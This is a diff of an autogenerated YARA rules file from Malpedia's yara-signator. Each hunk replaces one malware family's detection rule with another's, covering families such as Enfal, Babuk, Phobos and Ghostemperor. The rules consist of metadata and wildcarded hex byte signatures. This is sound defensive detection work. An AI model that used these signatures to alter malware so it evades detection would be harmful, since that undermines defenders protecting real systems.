+		id = "01bf52c7-5562-58b0-bd6b-f99194c0bb2b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yorekey"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yorekey_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.enfal_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "abba0a97f92aee372a13d852ed7f2662d19cb8080c2f20b48056340c1204a7ba"
+		logic_hash = "c231b8446e9ed78bdd8a9cb59296768a0836b06ecc839e3d3e3a25695d5dfcf0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80807,37 +81151,32 @@ rule MALPEDIA_Win_Yorekey_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 750a 85c0 7506 ff15???????? }
-		$sequence_1 = { 498bd7 488bcd e8???????? 85c0 0f85d9000000 488d1558fd0000 }
-		$sequence_2 = { 75f5 2bc2 8b15???????? d1f8 6a00 8d3400 }
-		$sequence_3 = { e8???????? 68???????? 8d45f4 50 c745f4e4d14000 e8???????? }
-		$sequence_4 = { eb1a 488d0d7d1e0100 e8???????? cc 488d0d701e0100 }
-		$sequence_5 = { 7626 83f910 7305 b8???????? 53 bb???????? 2bd8 }
-		$sequence_6 = { 42888401a0a40100 ffc7 ebde 488b0d???????? 83c8ff f00fc101 }
-		$sequence_7 = { 7420 48837daf10 727b 488b4d97 e8???????? b9c0270900 ff15???????? }
-		$sequence_8 = { 0f1f00 0fb74c05c8 488d4002 6642898c003ec10100 6685c9 75e9 b801000000 }
-		$sequence_9 = { c3 48895c2408 57 4883ec20 488d1d0f120100 488d3d08120100 eb0e }
-		$sequence_10 = { 3b04cd60184100 7413 41 83f92d 72f1 }
-		$sequence_11 = { 56 2bc1 50 8b8568ffffff 53 50 }
-		$sequence_12 = { 83f83c 762a 56 e8???????? 8d0445cc1e4100 8bc8 }
-		$sequence_13 = { 6bc930 8975e0 8db130154100 8975e4 eb2b 8a4601 84c0 }
-		$sequence_14 = { eb04 4883c014 8938 e8???????? 488d1d73190100 }
+		$sequence_0 = { 8975ec e8???????? 8b7508 83c424 8d4df0 }
+		$sequence_1 = { 51 8d8d68ffffff 51 8d8de8fcffff }
+		$sequence_2 = { ff75ec ffd6 894304 8d4318 50 6a00 68???????? }
+		$sequence_3 = { 837b1800 8945ec 0f86a6000000 894df4 8955f8 8b4dfc }
+		$sequence_4 = { 50 e8???????? 83c410 8b461c }
+		$sequence_5 = { 683f000f00 8d8d68feffff 53 51 6803000080 ff5048 85c0 }
+		$sequence_6 = { 8b4df0 8908 ff45fc 8345f804 8b45fc }
+		$sequence_7 = { 50 897da0 e8???????? 8d45f0 68???????? }
+		$sequence_8 = { ff55d4 85c0 7471 56 8d8554feffff 6a00 }
+		$sequence_9 = { e8???????? 83c444 8d45f0 53 }
 
 	condition:
-		7 of them and filesize < 274432
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Termite_Auto : FILE
+rule MALPEDIA_Win_Hesperbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ee31374f-70c6-5ab3-95b3-0fe1e417c08c"
+		id = "bb461f42-9b9a-5e68-bbce-8f8a48953354"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.termite_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hesperbot_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f0f791f686acda15650442706f1dd42f13979090335dd24cb4b6c5332386c748"
+		logic_hash = "5b0325f4989a837a39c4052bc59652c8fb0f8c04335eefffdde925a80c93ba45"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80851,32 +81190,32 @@ rule MALPEDIA_Win_Termite_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945f0 8b45f0 3b4510 7426 837df000 }
-		$sequence_1 = { 89e5 837d0800 740a 8b4508 8b4010 85c0 7507 }
-		$sequence_2 = { c745f001000000 837d08ff 750a b8ffffffff e9???????? c785ecfeffff00000000 c745f400000000 }
-		$sequence_3 = { c1e002 05???????? 8b00 8945e0 8b55e4 89d0 c1e002 }
-		$sequence_4 = { c745f000000000 eb46 8b4508 8b5010 8b45f0 6bc074 01d0 }
-		$sequence_5 = { 8b45ec 8b55f0 83c210 89442408 89542404 }
-		$sequence_6 = { 85c0 7432 8b4510 8d48ff 8b4508 8b4008 8b10 }
-		$sequence_7 = { c9 c3 55 89e5 83ec28 c745f400000000 c744240804000000 }
-		$sequence_8 = { 8b4508 8b4004 8d5001 8b4508 895004 8b45f0 8945ec }
-		$sequence_9 = { 8b45f0 89442404 8b4508 890424 e8???????? 8945e8 8b450c }
+		$sequence_0 = { 33742438 33c7 23742430 8b7c2444 337c243c 33742440 237c2434 }
+		$sequence_1 = { 5e c9 c3 8b4a3c 33c0 8d8c1188000000 394104 }
+		$sequence_2 = { ff7608 6a00 e8???????? 83c410 8b36 3bf7 75e1 }
+		$sequence_3 = { 8d7306 8d7b04 8903 e8???????? 85c0 7506 668907 }
+		$sequence_4 = { e8???????? 53 8945fc e8???????? 83c414 5b 8b45fc }
+		$sequence_5 = { 56 8bb42404030000 8d442414 33c9 57 2bf0 8d440c18 }
+		$sequence_6 = { 56 ff7514 33c0 50 6a01 8d4d10 51 }
+		$sequence_7 = { 8d45f8 99 52 50 8b4510 99 52 }
+		$sequence_8 = { 8974242c 8b742448 8bde 8bef 0fa4dd17 8bc7 c1e317 }
+		$sequence_9 = { 8902 894104 5f 33c0 40 5e c3 }
 
 	condition:
-		7 of them and filesize < 312320
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Socks5_Systemz_Auto : FILE
+rule MALPEDIA_Win_Avrecon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1b9e49c1-7943-57d2-ba80-481fd6bd4c4f"
+		id = "e9aaaaa7-af2e-5870-9eba-7f7fa77b0103"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.socks5_systemz_auto.yar#L1-L110"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avrecon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.avrecon_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "9753a87ae203dc0ffbfcfb14c7d357f4f852fcb6d79c68c3fdb61fe8b2c4fc73"
+		logic_hash = "e59963ec079d8f4d8ec354feb72326171934afc46817d03eebe4cd3c6c4dfb16"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80890,30 +81229,32 @@ rule MALPEDIA_Win_Socks5_Systemz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 50 ff15???????? c744242cffffffff 85ed 741d 8d4504 }
-		$sequence_1 = { 896c2414 eb0d 50 ff15???????? 8be8 89442414 896c241c }
-		$sequence_2 = { e8???????? 8b5c241c 8bd0 83c408 8bca }
-		$sequence_3 = { 7408 83f9ff 7403 51 ffd3 8975a0 e9???????? }
-		$sequence_4 = { 8d4900 8b0e e8???????? 83c608 3bf7 75f2 }
-		$sequence_5 = { c744241c00000000 c6471801 e8???????? 8b7f4c 8b37 3bf7 7415 }
-		$sequence_6 = { 8d442404 50 e8???????? f744240400000080 7479 53 }
-		$sequence_7 = { e8???????? c706???????? 8d4e14 8b470c 89460c 8b4710 894610 }
+		$sequence_0 = { 85c0 7431 6810270000 ff15???????? 837d0400 7420 }
+		$sequence_1 = { bf04010000 57 53 53 56 55 ff15???????? }
+		$sequence_2 = { e8???????? 8bf8 85ff 741f 56 8b35???????? 68???????? }
+		$sequence_3 = { 6a10 6a00 8d45dc 50 e8???????? 8d45f0 }
+		$sequence_4 = { c21000 33c0 ebf5 83c8ff ebf0 55 8bec }
+		$sequence_5 = { ebed c685dcebffff00 6a02 ff7508 ff15???????? ff7508 e8???????? }
+		$sequence_6 = { e8???????? 68???????? 53 e8???????? 85c0 0f84f0040000 8a08 }
+		$sequence_7 = { 50 8d85a8feffff 50 895d4c e8???????? 3bc3 }
+		$sequence_8 = { 49 7524 50 a3???????? ff15???????? e8???????? }
+		$sequence_9 = { 50 6a01 50 50 ff31 8975c0 50 }
 
 	condition:
-		7 of them and filesize < 1417216
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Fct_Auto : FILE
+rule MALPEDIA_Win_Babuk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "abc15496-5280-5df8-8374-6c73912930cc"
+		id = "8c7b928c-487d-526b-ac59-7d8bfd4e45d6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fct"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fct_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.babuk_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "459978803baa25140106f0b9d6fb1e3d43d379e92c63a80a39a4b43b54ebb800"
+		logic_hash = "354e556bcaba9e4e8ba4670f917c2bf0c9f534ada32a0a701e4d296506ec2560"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80927,32 +81268,38 @@ rule MALPEDIA_Win_Fct_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7515 8b4510 81784860504100 7409 ff7048 }
-		$sequence_1 = { c1f906 6bd038 8b45fc 03148d50614100 8b00 894218 }
-		$sequence_2 = { 7313 8a8788544100 08441619 42 0fb64101 }
-		$sequence_3 = { 83f81d 7cf1 eb07 8b0cc59c3a4100 894de4 }
-		$sequence_4 = { d1f9 51 57 8d4dbc e8???????? c745fc00000000 }
-		$sequence_5 = { 75f5 8b5dec 2bca 8b55e8 8bc3 }
-		$sequence_6 = { 8d5102 668b01 83c102 6685c0 75f5 8b5dec }
-		$sequence_7 = { 51 8d4da4 c745b400000000 c745b80f000000 c645a400 }
-		$sequence_8 = { ffb54cfdffff 6a02 e8???????? 837dd008 }
-		$sequence_9 = { 8d8d34fdffff ffb514fdffff 50 e8???????? }
+		$sequence_0 = { ff15???????? 6800000100 e8???????? 83c404 }
+		$sequence_1 = { 50 ff15???????? 83f803 7502 }
+		$sequence_2 = { e8???????? 83c408 8b4d18 8b5508 }
+		$sequence_3 = { 8b0cca 51 e8???????? 83c408 8945f4 8955f8 }
+		$sequence_4 = { 83c002 8945fc 837dfc0a 0f83dc000000 8b4dfc }
+		$sequence_5 = { 89441104 ba08000000 6bc20a 8b4d08 c7040100000000 }
+		$sequence_6 = { 8b4d08 8b540104 52 8b0401 50 }
+		$sequence_7 = { c7040100000000 c744010400000000 ba08000000 6bc200 8b4d08 }
+		$sequence_8 = { 6a0a 6a06 6a02 8d45bc 50 }
+		$sequence_9 = { 68???????? 8b45ec 50 ff15???????? 8945f4 837df400 }
+		$sequence_10 = { 8801 eba7 e9???????? 8b4dfc 33cd e8???????? }
+		$sequence_11 = { 50 8d4dac 51 8b55ac 52 8b45a4 50 }
+		$sequence_12 = { 0f84c6000000 6800800000 8b8de8fdffff 51 ff15???????? 8985e0fdffff 83bdecfdffff00 }
+		$sequence_13 = { 8b5508 8b44ca04 50 8b0cca }
+		$sequence_14 = { 8b5508 c7040a00000000 c7440a0400000000 c745fc00000000 eb09 }
+		$sequence_15 = { 6bf100 8b45ec 8b55f0 b11a e8???????? }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 183296
 }
-rule MALPEDIA_Win_Ahtapot_Auto : FILE
+rule MALPEDIA_Win_Lyposit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "205853ed-0c62-5497-8ae7-152aba719174"
+		id = "6a1182ef-14f9-5ae8-9cfb-f5f8b2d96cab"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ahtapot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ahtapot_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lyposit_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "392656dae04b266a3580579c812b8abd790d9485771e5a66abe1a48d413d41a8"
+		logic_hash = "249026f12880d5f66834071d41f0c2254bacd8b35bc56d04ae3c23c7c93561c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -80966,32 +81313,32 @@ rule MALPEDIA_Win_Ahtapot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd6 6a44 8d8d44f5ffff 53 51 e8???????? }
-		$sequence_1 = { 51 68???????? e8???????? 83c404 50 68???????? 8d95c8f3ffff }
-		$sequence_2 = { 6a00 6a00 8d85e0f2ffff 50 6a00 ff15???????? 8b8dcceeffff }
-		$sequence_3 = { 741e 6683f80d 74d8 668907 83c702 33c9 66890f }
-		$sequence_4 = { 33c9 83f823 741a 8d93fc100000 8d4900 46 668902 }
-		$sequence_5 = { 8985f0ebffff 52 8d85f0ebffff 50 898df4ebffff }
-		$sequence_6 = { 83c414 8d95c0edffff 52 ffd7 6a00 6a00 }
-		$sequence_7 = { 8d8528ecffff 8bff 668b10 663b11 751e 6685d2 7415 }
-		$sequence_8 = { 399db0cbffff 7526 8b8584cbffff 83c804 83e017 }
-		$sequence_9 = { 8bec 6aff 68???????? 64a100000000 50 81ecb00a0000 a1???????? }
+		$sequence_0 = { eb0a c645e703 eb04 c645e702 8d7e01 897dd8 c645e300 }
+		$sequence_1 = { 8945e0 56 6a40 ffd7 8945e4 56 ff75e0 }
+		$sequence_2 = { 59 895ddc 395de0 740f 8b45cc 3bc3 }
+		$sequence_3 = { 0f8d42040000 837e04ff 7408 e8???????? 8b450c }
+		$sequence_4 = { 83c410 834dfcff eb91 55 8bec 837d0c10 742c }
+		$sequence_5 = { 53 e8???????? 8bf8 53 e8???????? ff75d0 }
+		$sequence_6 = { c1e804 a801 743b 8b4d10 0fb701 6683f82f }
+		$sequence_7 = { be00040000 6a1e 8945f0 5f bbba000000 c745f440010000 }
+		$sequence_8 = { 395d0c 750b 834dfcff 33c0 e9???????? 391d???????? }
+		$sequence_9 = { 59 e8???????? e2f9 59 43 83e903 }
 
 	condition:
-		7 of them and filesize < 430080
+		7 of them and filesize < 466944
 }
-rule MALPEDIA_Win_Sodamaster_Auto : FILE
+rule MALPEDIA_Win_Jasus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d1f7db4a-f731-535e-9ec7-0f94492b7206"
+		id = "e40f0cf2-c464-539f-a5ee-e734bdbeed88"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sodamaster_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jasus_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "fa1144cbcb2ad99084cc1ee6d93d89428028e0238c89b4c179e1b18530e08c7f"
+		logic_hash = "2c691c8874b1ab7be876ba59aead20405103b0885bc9bec7a0a38d9442642c23"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81005,32 +81352,32 @@ rule MALPEDIA_Win_Sodamaster_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5d c3 8b04c5d4ca0010 5d c3 8bff 55 }
-		$sequence_1 = { 83c002 6685c9 75f5 8b8d14fbffff 2bc2 }
-		$sequence_2 = { 8b748104 40 6a64 8945e8 ff15???????? 3bf3 }
-		$sequence_3 = { 8bc3 c1f805 8d3c85a0330110 8bf3 83e61f c1e606 }
-		$sequence_4 = { a3???????? a1???????? c705????????ee5c0010 8935???????? a3???????? }
-		$sequence_5 = { 2bc1 8d8df0efffff 51 8bc8 e8???????? 8b35???????? 83c404 }
-		$sequence_6 = { 52 51 d1f8 50 8d9524ffffff }
-		$sequence_7 = { 85c0 743a 8b55ec 52 ff15???????? 8bf8 }
-		$sequence_8 = { 0f84d5000000 8b95e8efffff 53 8d85dcefffff 50 }
-		$sequence_9 = { ff15???????? eb10 c745da64006c00 b96c000000 66894dde }
+		$sequence_0 = { 668b5304 83ec08 8bc4 8930 66897804 83ec08 8bc4 }
+		$sequence_1 = { 52 ff15???????? 8b4608 50 68???????? e8???????? 68???????? }
+		$sequence_2 = { 41 ebf3 68???????? 51 894dec 894de8 e8???????? }
+		$sequence_3 = { 81e7ff000000 894e04 3304bda0ca4100 8bf8 8b442418 }
+		$sequence_4 = { 6a07 c1f804 59 8985a4fbffff 3bc1 0f87260a0000 ff248514274100 }
+		$sequence_5 = { 668b1d???????? 898d78ffffff 668b0d???????? 899564ffffff 8b15???????? 66898d68ffffff 89957cffffff }
+		$sequence_6 = { 50 68???????? 51 e8???????? 8b9dccfaffff 83c418 32c9 }
+		$sequence_7 = { 56 8b7508 8bc6 c1f805 8d1485809d4300 8b0a 83e61f }
+		$sequence_8 = { 51 8d5580 52 8d857cffffff 50 8d8d78ffffff }
+		$sequence_9 = { 833d????????00 0fb75708 8b4f04 8b07 66899568feffff 0fb715???????? 898d64feffff }
 
 	condition:
-		7 of them and filesize < 134144
+		7 of them and filesize < 507904
 }
-rule MALPEDIA_Win_Lurk_Auto : FILE
+rule MALPEDIA_Win_Bachosens_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d33e5d41-4c33-52cb-9d86-097c6e297a69"
+		id = "fad5470b-a756-574b-813e-1cdf42efa6b2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lurk_auto.yar#L1-L176"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bachosens"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bachosens_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "49386f4cf56b83db74fc2cce7fdb3bbe57cfb7600cc336d7243ab2a9983dbda5"
+		logic_hash = "0a45763c922e1378fcd981d3ff76c84b7a49bb1ac5b3430f86089ebe86f29abf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81044,38 +81391,32 @@ rule MALPEDIA_Win_Lurk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7508 ff15???????? 8b35???????? 50 ff7508 }
-		$sequence_1 = { 8b4508 5b 5f 5e c9 c3 55 }
-		$sequence_2 = { 384807 7562 384808 755d 384809 }
-		$sequence_3 = { c1ee05 33ce f7d1 33c1 42 43 3b5c2410 }
-		$sequence_4 = { c1f803 8945f4 c745f800000000 eb09 8b4df8 83c101 894df8 }
-		$sequence_5 = { 8b7c240c 33f6 6a04 57 6a03 e8???????? 83c40c }
-		$sequence_6 = { ffd6 83f802 7546 8365bc00 8d45b8 50 6a20 }
-		$sequence_7 = { 8b4d08 ff75f8 03c3 c7406045763812 }
-		$sequence_8 = { 8b4d08 8d440802 50 ff75fc ff5714 }
-		$sequence_9 = { 8b4dd8 0308 894db8 8365bc00 8b45bc c1c80d 8945bc }
-		$sequence_10 = { 74de 56 8b35???????? 8d85fcfeffff 50 ffd6 8d8dfcfeffff }
-		$sequence_11 = { 8945cc 8b45e0 668b4024 668945c8 }
-		$sequence_12 = { c645fa25 c645fb75 c645fc2f c645fd00 e8???????? }
-		$sequence_13 = { ff7508 ff7510 e8???????? 83c418 85c0 7502 33f6 }
-		$sequence_14 = { 8b4d08 8d540102 8955f8 8b45f8 }
-		$sequence_15 = { 8bec 83ec0c 53 56 8b7508 0fb606 }
+		$sequence_0 = { 48895c2408 57 4883ec20 65488b042560000000 488bf9 }
+		$sequence_1 = { 75f5 33c9 41380a 7417 498bc2 660f1f840000000000 }
+		$sequence_2 = { 488d4002 66443908 75f3 418bc9 66390a }
+		$sequence_3 = { 80c1e0 3ad1 7513 49ffc0 }
+		$sequence_4 = { 7416 488b1b 488b1b 488bd7 488b4b50 e8???????? }
+		$sequence_5 = { ffc2 488d4001 803800 75f5 33c9 41380a 7417 }
+		$sequence_6 = { e8???????? 85c0 7416 488b1b 488b1b }
+		$sequence_7 = { 33c9 41380a 7417 498bc2 660f1f840000000000 ffc1 488d4001 }
+		$sequence_8 = { 488bc7 ffc2 488d4001 803800 75f5 33c9 41380a }
+		$sequence_9 = { 4c03d1 458b7220 418b521c 4c03f1 458b7a24 4803d1 }
 
 	condition:
-		7 of them and filesize < 5316608
+		7 of them and filesize < 643072
 }
-rule MALPEDIA_Win_Vhd_Ransomware_Auto : FILE
+rule MALPEDIA_Win_Backconfig_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fa5e5a99-c535-5a94-a209-b7a09fa24c2a"
+		id = "18fd149c-ad9b-5433-8651-ac1dcd92de05"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vhd_ransomware_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backconfig"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.backconfig_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "084f45fac9b312e6724b7901489af4dd8f07289f6b7a3bdcfaaadbb0b1238055"
+		logic_hash = "dc29e43fa81d60d5f53e6f4d5e158937c417e8f12650929b20d71338a8cb5ead"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81089,34 +81430,34 @@ rule MALPEDIA_Win_Vhd_Ransomware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 33c5 8945fc 53 8bd9 8b13 57 }
-		$sequence_1 = { 83c410 8dbdf0fdffff e8???????? a1???????? e9???????? }
-		$sequence_2 = { 33d2 e8???????? 8b4d08 0bc7 }
-		$sequence_3 = { 8b450c 8902 33c0 89a578f6ffff 39450c 7e11 8d4a04 }
-		$sequence_4 = { 83c404 a1???????? 8b3d???????? 40 6a00 c1e018 }
-		$sequence_5 = { 8b4d08 85c9 7538 33c0 b9c8000000 }
-		$sequence_6 = { 333c9598754100 337e04 ff4de8 897804 8b38 }
-		$sequence_7 = { f7e2 0f90c1 89b518f0ffff f7d9 0bc8 51 }
-		$sequence_8 = { 8945cc bf40000000 b8???????? 8d75e0 895dc8 c745f40f000000 c745f000000000 }
-		$sequence_9 = { d9bd1ee6ffff 0fb7851ee6ffff 0d000c0000 898518e6ffff 43 d9ad18e6ffff db9d18e6ffff }
+		$sequence_0 = { a1???????? 8b0d???????? 8b15???????? 8985f0feffff a1???????? 6a51 8985fcfeffff }
+		$sequence_1 = { e8???????? 8b4de4 83c40c 6bc930 8975e0 8db1682a4100 }
+		$sequence_2 = { 8a15???????? 8d8569ffffff 6a00 50 898d64ffffff 889568ffffff }
+		$sequence_3 = { c1f805 8d1485c0504100 8b0a 83e61f c1e606 03ce }
+		$sequence_4 = { 8bc3 c1f805 8d3c85c0504100 8bf3 83e61f c1e606 8b07 }
+		$sequence_5 = { 8b0d???????? 8b15???????? 8985f0feffff a1???????? 6a51 8985fcfeffff 898df4feffff }
+		$sequence_6 = { 8d8d2cfdffff 68???????? 51 e8???????? 83c414 68401f0000 }
+		$sequence_7 = { 6a00 50 898d64ffffff 889568ffffff e8???????? }
+		$sequence_8 = { 8bf1 83e61f 8d3c85c0504100 8b07 c1e606 f644300401 7436 }
+		$sequence_9 = { 8bec 8b4508 56 8d34c550224100 833e00 7513 }
 
 	condition:
-		7 of them and filesize < 275456
+		7 of them and filesize < 217088
 }
-rule MALPEDIA_Win_Phobos_Auto : FILE
+rule MALPEDIA_Win_Ghostemperor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "50012a05-a115-568a-af1b-c38bab4b83db"
+		id = "f7621211-4b28-566a-b3ea-8ff428be0537"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.phobos_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostemperor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ghostemperor_auto.yar#L1-L213"
 		license_url = "N/A"
-		logic_hash = "c0587de91f9b07bd28460653ab9d55aeeffabbc31465d7d7ac9b9413a4a57c0d"
+		logic_hash = "52e1433fc52738b98f2cb3208f8e4210fe3ef53162cc193cfeb7b527c13f1b16"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -81128,34 +81469,47 @@ rule MALPEDIA_Win_Phobos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ff36 ff15???????? 8bd8 83fbff 7509 ff15???????? }
-		$sequence_1 = { 5b c9 c3 8b4620 85c0 7407 50 }
-		$sequence_2 = { 33ff 5b c6043080 3bc3 40 730e 3bc3 }
-		$sequence_3 = { ff15???????? 89442414 e8???????? 6a00 6a14 89442420 e8???????? }
-		$sequence_4 = { 68a00f0000 8d4610 50 ff15???????? }
-		$sequence_5 = { 8b450c 83c414 85c0 7408 8b0e 8b4c3908 }
-		$sequence_6 = { 59 50 8945fc e8???????? 8bf8 59 85ff }
-		$sequence_7 = { 333c9dd0b54000 8bda 23d8 333c9dd0c14000 8b5df0 337910 }
-		$sequence_8 = { 83c104 83fe08 72d6 8b0a 83e90a 0f8466010000 49 }
-		$sequence_9 = { 2bfa 53 0fb716 0fb71c37 663bd3 770a 720d }
+		$sequence_0 = { 7406 8b442424 eb0d c7442424ffffffff }
+		$sequence_1 = { 4183f802 743b 8a4802 41304902 }
+		$sequence_2 = { 0f1004fa 0f104cfa10 0f1014f9 0f57d0 0f1044f910 }
+		$sequence_3 = { 31d2 41b801000000 4531c9 ff15???????? }
+		$sequence_4 = { 488d5108 e8???????? 8b4648 85c0 746e 8b564c }
+		$sequence_5 = { 4c8b5c2408 4883c410 c3 ff25???????? ff25???????? ff25???????? ff25???????? }
+		$sequence_6 = { e8???????? 48c7471000000000 eb09 c7471800000000 }
+		$sequence_7 = { 44894648 49c1e003 488d5108 e8???????? }
+		$sequence_8 = { 4889c3 448b4650 4403464c 49c1e003 4889c1 31d2 e8???????? }
+		$sequence_9 = { 66448974247c 448874247e 4885c0 0f84d8010000 c744242037008900 c74424246300ec00 }
+		$sequence_10 = { 33d2 c745979b00a000 c7459b81009200 33db c7459ff600a600 }
+		$sequence_11 = { 48ffc0 664539644602 75f5 483bd8 }
+		$sequence_12 = { 488d4c2420 488d7d72 ff5008 488d4d72 }
+		$sequence_13 = { 01c1 89ca c1ea1f c1f904 }
+		$sequence_14 = { 00c2 488b8568020000 8854080c 488b85b0020000 }
+		$sequence_15 = { c744246064005a00 c744246458005a00 0f10442458 c74424682a00a900 }
+		$sequence_16 = { 00c1 488b8568020000 488b95b0020000 884c100c 488b85b0020000 488b85b0020000 488b85b0020000 }
+		$sequence_17 = { 4881ecf0010000 488d05ed1e0000 4533ff 488d4c2420 4889442420 }
